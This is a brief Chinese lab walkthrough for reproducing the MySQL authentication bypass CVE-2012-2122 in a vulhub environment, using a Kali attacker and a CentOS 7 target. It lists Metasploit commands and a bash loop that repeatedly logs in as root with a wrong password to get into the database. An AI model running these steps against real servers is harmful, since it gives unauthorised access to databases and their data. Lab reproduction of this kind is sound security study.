靶机:centos7
攻击机:kali
进入mysql环境
cd vulhub
ls
cd mysql
cd CVE-2012-2122
攻击机:kali
进入:msfconsole
查找对应的漏洞:search CVE-2012-2122
使用:use 0
查看配置选项,yes为必填选项:show options/options
设置靶机ip:set rhost XXX
查看是否配置成功:show options
运行:run/exploit
获取数据库账户密码:for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.17.180(靶机IP) -P3306 ; done
验证:show databases;